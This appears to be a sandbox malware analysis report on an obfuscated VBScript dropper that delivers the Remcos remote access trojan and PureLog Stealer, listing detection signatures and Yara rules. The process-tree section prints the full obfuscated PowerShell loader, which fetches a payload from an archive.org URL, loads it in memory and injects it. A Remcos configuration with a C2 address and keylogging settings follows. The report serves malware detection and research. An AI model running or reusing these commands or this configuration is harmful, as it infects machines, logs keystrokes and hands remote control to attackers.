Edit tour
Windows
Analysis Report
5fKvwnCAeC.vbs
Overview
General Information
Sample name: | 5fKvwnCAeC.vbsrenamed because original name is a hash value |
Original sample name: | f47da41573231159283b297aee90e0265ae0b53812d508d59be4fd97e89bdd41.vbs |
Analysis ID: | 1523832 |
MD5: | 0c6c4542c1abc5fc3d5eab3e4ab3793a |
SHA1: | 288dfb240061530c2c73ae4183b7330623e94a69 |
SHA256: | f47da41573231159283b297aee90e0265ae0b53812d508d59be4fd97e89bdd41 |
Tags: | BlindEaglevbsuser-JAMESWT_MHT |
Infos: | |
Detection
Remcos, PureLog Stealer
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell decode and execute
Yara detected PureLog Stealer
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7808 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\5fKvw nCAeC.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 8120 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' LiggJHNIRU xsSWRbMV0r JHNoRWxsSU RbMTNdKydY JykgKCgnRk lpJysndXJs ID0gOXVPaH R0cHMnKyc6 LycrJy9pYT YwMCcrJzEw MC51cy5hcm NoJysnaScr J3ZlLm9yZy 8yNC8nKydp dGVtcy9kZS crJ3RhaC1u b3RlLScrJ3 YvRGV0YScr J2hOJysnb3 QnKydlVi50 eHQ5dU87Jy snRkknKydp JysnYmFzZS crJzY0Qycr J29uJysndC crJ2VuJysn dCcrJyAnKy c9IChOZXct T2JqZWN0IF N5c3RlbS5O JysnZScrJ3 QnKycuV2Vi JysnQycrJ2 xpJysnZW50 KS5EJysnb3 cnKydubCcr J29hZCcrJ1 N0cmluZyhG JysnSScrJ2 knKyd1cicr J2wpJysnO0 ZJaWInKydp bmFyeUNvbi crJ3RlJysn bnQnKycgJy snPSBbU3lz dGVtJysnLi crJ0NvbnZl cnRdOjpGcm 9tQmEnKydz ZTY0JysnU3 QnKydyaW4n KydnJysnKE YnKydJaWJh cycrJ2UnKy c2NENvbnRl JysnbnQpO0 ZJaWFzJysn c2VtJysnYm x5ID0gJysn W1JlZmxlJy snY3QnKydp b24uQXNzZW 1ibHldOjpM bycrJ2FkKE ZJaWJpbicr J2FyJysneU MnKydvbnRl bnQpO0ZJaX R5JysncGUg PSBGSWlhc3 MnKydlbScr J2JseS5HZX QnKydUeXBl KDl1T1J1bl AnKydFLkhv bWU5dScrJ0 8pO0ZJaW1l dGhvZCAnKy c9IEYnKydJ JysnaXR5cG UnKycuR2V0 TWV0JysnaG 9kJysnKDl1 T1ZBJysnST l1Tyk7Ricr J0lpbWUnKy d0JysnaG8n KydkJysnLi crJ0ludm9r ZScrJyhGSW knKyduJysn dWwnKydsLC BbJysnb2Jq ZWMnKyd0W1 1dQCg5dU90 eHQuRicrJ0 MnKydDTVIv JysnNzExMi 8zMjEuOTgu MDkuJysnNT QvLzonKydw JysndCcrJ3 RoOScrJ3VP ICwgOXUnKy dPZGVzYXRp dmFkbzknKy d1JysnTycr JyAsIDl1T2 RlJysncycr J2EnKyd0aS crJ3ZhZCcr J285dU8gLC A5dU9kZXNh dGl2JysnYW RvOXVPLDl1 T1JlZycrJ0 FzbTl1Tyw5 dU85JysndU 8nKycpKScp LnJFUGxBQ2 UoKFtjaEFS XTcwK1tjaE FSXTczK1tj aEFSXTEwNS ksW3NUcmlu Z11bY2hBUl 0zNikuckVQ bEFDZSgoW2 NoQVJdNTcr W2NoQVJdMT E3K1tjaEFS XTc5KSxbc1 RyaW5nXVtj aEFSXTM5KS k=';$OWjux d = [syste m.Text.enc oding]::UT F8.GetStri ng([system .Convert]: :Frombase6 4String($c odigo));po wershell.e xe -window style hidd en -execut ionpolicy bypass -No Profile -c ommand $OW juxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 8132 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7484 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and ".( $s HELlId[1]+ $shEllID[1 3]+'X') (( 'FIi'+'url = 9uOhttp s'+':/'+'/ ia600'+'10 0.us.arch' +'i'+'ve.o rg/24/'+'i tems/de'+' tah-note-' +'v/Deta'+ 'hN'+'ot'+ 'eV.txt9uO ;'+'FI'+'i '+'base'+' 64C'+'on'+ 't'+'en'+' t'+' '+'= (New-Objec t System.N '+'e'+'t'+ '.Web'+'C' +'li'+'ent ).D'+'ow'+ 'nl'+'oad' +'String(F '+'I'+'i'+ 'ur'+'l)'+ ';FIib'+'i naryCon'+' te'+'nt'+' '+'= [Sys tem'+'.'+' Convert]:: FromBa'+'s e64'+'St'+ 'rin'+'g'+ '(F'+'Iiba s'+'e'+'64 Conte'+'nt );FIias'+' sem'+'bly = '+'[Refl e'+'ct'+'i on.Assembl y]::Lo'+'a d(FIibin'+ 'ar'+'yC'+ 'ontent);F Iity'+'pe = FIiass'+ 'em'+'bly. Get'+'Type (9uORunP'+ 'E.Home9u' +'O);FIime thod '+'= F'+'I'+'it ype'+'.Get Met'+'hod' +'(9uOVA'+ 'I9uO);F'+ 'Iime'+'t' +'ho'+'d'+ '.'+'Invok e'+'(FIi'+ 'n'+'ul'+' l, ['+'obj ec'+'t[]]@ (9uOtxt.F' +'C'+'CMR/ '+'7112/32 1.98.09.'+ '54//:'+'p '+'t'+'th9 '+'uO , 9u '+'Odesati vado9'+'u' +'O'+' , 9 uOde'+'s'+ 'a'+'ti'+' vad'+'o9uO , 9uOdesa tiv'+'ado9 uO,9uOReg' +'Asm9uO,9 uO9'+'uO'+ '))').rEPl ACe(([chAR ]70+[chAR] 73+[chAR]1 05),[sTrin g][chAR]36 ).rEPlACe( ([chAR]57+ [chAR]117+ [chAR]79), [sTring][c hAR]39))" MD5: 04029E121A0CFA5991749937DD22A1D9) - RegAsm.exe (PID: 7048 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Asm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity. |
{"Host:Port:Password": "45.90.89.98:8243:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-O0U3JA", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
Click to see the 19 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
REMCOS_RAT_variants | unknown | unknown |
| |
Click to see the 11 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |